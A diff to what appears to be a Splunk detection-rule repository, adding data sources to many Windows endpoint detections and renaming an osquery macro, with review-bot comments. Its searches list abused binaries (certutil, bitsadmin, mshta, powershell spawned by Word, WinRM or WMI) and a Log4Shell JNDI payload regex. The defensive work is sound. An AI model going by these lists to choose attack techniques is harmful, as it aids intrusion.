diff --git a/detections/endpoint/windows_wmi_process_call_create.yml b/detections/endpoint/windows_wmi_process_call_create.yml
index efc4d39129..4b25361044 100644
--- a/detections/endpoint/windows_wmi_process_call_create.yml
+++ b/detections/endpoint/windows_wmi_process_call_create.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of WMI command lines u
within the environment, posing a severe threat to organizational security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
= "* process *" Processes.process = "* call *" Processes.process = "* create *"
diff --git a/detections/endpoint/winhlp32_spawning_a_process.yml b/detections/endpoint/winhlp32_spawning_a_process.yml
index 1193ec77ed..8a548f94a9 100644
--- a/detections/endpoint/winhlp32_spawning_a_process.yml
+++ b/detections/endpoint/winhlp32_spawning_a_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects winhlp32.exe spawning a child proces
loads, and file modifications for further suspicious behavior.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winhlp32.exe
Processes.process IN ("*\\appdata\\*","*\\programdata\\*", "*\\temp\\*") by Processes.dest
diff --git a/detections/endpoint/winrar_spawning_shell_application.yml b/detections/endpoint/winrar_spawning_shell_application.yml
index 5f72b97010..2664e41ba3 100644
--- a/detections/endpoint/winrar_spawning_shell_application.yml
+++ b/detections/endpoint/winrar_spawning_shell_application.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of Windows shell processes
initiated by WinRAR, such as "cmd.exe", "powershell.exe", "certutil.exe", "mshta.exe",
or "bitsadmin.exe". This detection leverages data from Endpoint Detection and Response
diff --git a/detections/endpoint/winrm_spawning_a_process.yml b/detections/endpoint/winrm_spawning_a_process.yml
index 8545e5ff94..f264bee32b 100644
--- a/detections/endpoint/winrm_spawning_a_process.yml
+++ b/detections/endpoint/winrm_spawning_a_process.yml
@@ -14,6 +14,8 @@ description: The following analytic detects suspicious processes spawned by WinR
persistence, posing a severe threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=wsmprovhost.exe
Processes.process_name IN ("cmd.exe","sh.exe","bash.exe","powershell.exe","pwsh.exe","schtasks.exe","certutil.exe","whoami.exe","bitsadmin.exe","scp.exe")
diff --git a/detections/endpoint/winword_spawning_cmd.yml b/detections/endpoint/winword_spawning_cmd.yml
index 0b0bee811b..b556dd77a0 100644
--- a/detections/endpoint/winword_spawning_cmd.yml
+++ b/detections/endpoint/winword_spawning_cmd.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Word (w
or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winword.exe
`process_cmd` by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/winword_spawning_powershell.yml b/detections/endpoint/winword_spawning_powershell.yml
index 70f84db7d7..8dcfca564b 100644
--- a/detections/endpoint/winword_spawning_powershell.yml
+++ b/detections/endpoint/winword_spawning_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Word (w
further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="winword.exe"
`process_powershell` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/winword_spawning_windows_script_host.yml b/detections/endpoint/winword_spawning_windows_script_host.yml
index 97421a66cc..fe26ab1e9c 100644
--- a/detections/endpoint/winword_spawning_windows_script_host.yml
+++ b/detections/endpoint/winword_spawning_windows_script_host.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Winword
or establish persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="winword.exe"
Processes.process_name IN ("cscript.exe", "wscript.exe") by Processes.dest Processes.user
diff --git a/detections/endpoint/wmi_permanent_event_subscription.yml b/detections/endpoint/wmi_permanent_event_subscription.yml
index 4c15c26cac..66c5755a09 100644
--- a/detections/endpoint/wmi_permanent_event_subscription.yml
+++ b/detections/endpoint/wmi_permanent_event_subscription.yml
@@ -7,8 +7,7 @@ status: experimental
type: TTP
description: |-
The following analytic detects the creation of permanent event subscriptions using Windows Management Instrumentation (WMI). It leverages Sysmon Event ID 5 data to identify instances where the event consumers are not the expected "NTEventLogEventConsumer." This activity is significant because it suggests an attacker is attempting to achieve persistence by running malicious scripts or binaries in response to specific system events. If confirmed malicious, this could lead to severe impacts such as data theft, ransomware deployment, or other damaging outcomes. Investigate the associated scripts or binaries to identify the source of the attack.
-data_source:
-- Windows Event Log WMI 5861
+data_source: []
search: '`wmi` EventCode=5861 Binding | rex field=Message "Consumer =\s+(?[^;|^$]+)"
| search consumer!="NTEventLogEventConsumer=\"SCM Event Log Consumer\"" | stats
count min(_time) as firstTime max(_time) as lastTime by ComputerName, consumer,
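Review bot: Setting `data_source: []` while the search still runs `` `wmi` EventCode=5861 `` makes the metadata say the detection has no data-source requirement although it depends on WMI-Activity event 5861, so anything that uses data_source for onboarding guidance or coverage reporting will now treat it as unconstrained. If the `Windows Event Log WMI 5861` definition was removed from data_sources/ deliberately, the dependency should be carried elsewhere, e.g. a sentence in the description such as `Requires the WMI-Activity Operational log (EventCode 5861) to be ingested.` The same emptying happens in wmi_temporary_event_subscription (EventCode 5860) and log4shell_jndi_payload_injection_with_outbound_connection (Splunk Stream IP). The search field continues past the hunk.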
diff --git a/detections/endpoint/wmi_temporary_event_subscription.yml b/detections/endpoint/wmi_temporary_event_subscription.yml
index 3e9a1cee3b..8f1072481d 100644
--- a/detections/endpoint/wmi_temporary_event_subscription.yml
+++ b/detections/endpoint/wmi_temporary_event_subscription.yml
@@ -13,8 +13,7 @@ description: "The following analytic detects the creation of WMI temporary event
code, escalate privileges, or persist in the environment. Analysts should review
the specific WMI queries and assess their intent, considering potential false positives
from legitimate administrative tasks."
-data_source:
-- Windows Event Log WMI 5860
+data_source: []
search: '`wmi` EventCode=5860 Temporary | rex field=Message "NotificationQuery =\s+(?[^;|^$]+)"
| search query!="SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = ''wsmprovhost.exe''"
AND query!="SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA ''AntiVirusProduct''
diff --git a/detections/endpoint/wmic_group_discovery.yml b/detections/endpoint/wmic_group_discovery.yml
index 8ec9c7c739..716380a511 100644
--- a/detections/endpoint/wmic_group_discovery.yml
+++ b/detections/endpoint/wmic_group_discovery.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the use of `wmic.exe` to enumera
and persistence within the environment.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe
(Processes.process="*group get name*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/wmic_noninteractive_app_uninstallation.yml b/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
index 4e598965b7..fb1fb67d6f 100644
--- a/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
+++ b/detections/endpoint/wmic_noninteractive_app_uninstallation.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of the WMIC command-line
within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wmic.exe
Processes.process="* product *" Processes.process="*where name*" Processes.process="*call
diff --git a/detections/endpoint/wmic_xsl_execution_via_url.yml b/detections/endpoint/wmic_xsl_execution_via_url.yml
index dea2d4446b..70e85434ac 100644
--- a/detections/endpoint/wmic_xsl_execution_via_url.yml
+++ b/detections/endpoint/wmic_xsl_execution_via_url.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `wmic.exe` loading a remote XSL scri
posing a severe threat to the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
IN ("*http://*", "*https://*") Processes.process="*/format:*" by Processes.parent_process_name
diff --git a/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml b/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
index 320825cc45..f8d610725e 100644
--- a/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/wmiprsve_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic detects `wmiprvse.exe` spawning a LOLBAS exe
environment, posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wmiprvse.exe)
(Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml b/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
index be80f2ab03..11cda609cc 100644
--- a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
+++ b/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies suspicious child processes spawne
or maintain persistence within the environment, posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
IN ("cscript.exe", "wscript.exe") Processes.process_name IN ("regsvr32.exe", "rundll32.exe","winhlp32.exe","certutil.exe","msbuild.exe","cmd.exe","powershell*","wmic.exe","mshta.exe")
diff --git a/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml b/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
index 7d85e2a050..2d595d3285 100644
--- a/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
+++ b/detections/endpoint/wsmprovhost_lolbas_execution_process_spawn.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies `Wsmprovhost.exe` spawning a LOLB
or maintain persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=wsmprovhost.exe)
(Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe",
diff --git a/detections/endpoint/wsreset_uac_bypass.yml b/detections/endpoint/wsreset_uac_bypass.yml
index 6d27b6f43a..addf1d284f 100644
--- a/detections/endpoint/wsreset_uac_bypass.yml
+++ b/detections/endpoint/wsreset_uac_bypass.yml
@@ -14,7 +14,8 @@ description: The following analytic detects a suspicious modification of the reg
If confirmed malicious, this could lead to unauthorized code execution and potential
system compromise.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/xsl_script_execution_with_wmic.yml b/detections/endpoint/xsl_script_execution_with_wmic.yml
index 87c4f9bd36..b06116aa92 100644
--- a/detections/endpoint/xsl_script_execution_with_wmic.yml
+++ b/detections/endpoint/xsl_script_execution_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of an XSL script using
the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` Processes.process
= "*os get*" Processes.process="*/format:*" Processes.process = "*.xsl*" by Processes.parent_process_name
diff --git a/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml b/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
index a67f0cc60f..765298db54 100644
--- a/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
+++ b/detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml
@@ -13,8 +13,7 @@ description: The following analytic detects Log4Shell JNDI payload injections vi
in Java web applications using log4j, potentially leading to remote code execution.
If confirmed malicious, attackers could gain unauthorized access, execute arbitrary
code, and compromise sensitive data within the affected environment.
-data_source:
-- Splunk Stream IP
+data_source: []
search: '| from datamodel Web.Web | rex field=_raw max_match=0 "[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)(?\w+)(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?(?[a-zA-Z0-9\.\-\_\$]+)"
| join affected_host type=inner [| tstats `security_content_summariesonly` count
min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic
diff --git a/macros/osquery.yml b/macros/osquery_macro.yml
similarity index 91%
rename from macros/osquery.yml
rename to macros/osquery_macro.yml
index 93de155245..32473363ff 100644
--- a/macros/osquery.yml
+++ b/macros/osquery_macro.yml
@@ -1,4 +1,4 @@
definition: sourcetype=osquery:results
description: customer specific splunk configurations(eg- index, source, sourcetype).
Replace the macro definition with configurations for your Splunk Environmnent.
-name: osquery
\ No newline at end of file
+name: osquery_macro
\ No newline at end of file
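Review bot: Renaming the macro to `name: osquery_macro` changes the name that detection searches reference as `` `osquery` ``; any search still using the old name will fail to expand, so every caller under detections/ needs the same update, which this diff does not show and is worth grepping for. The new `name` line still ends with `\ No newline at end of file`, and the context line above it carries the typo `Environmnent`; both are cheap to fix while this file is being touched.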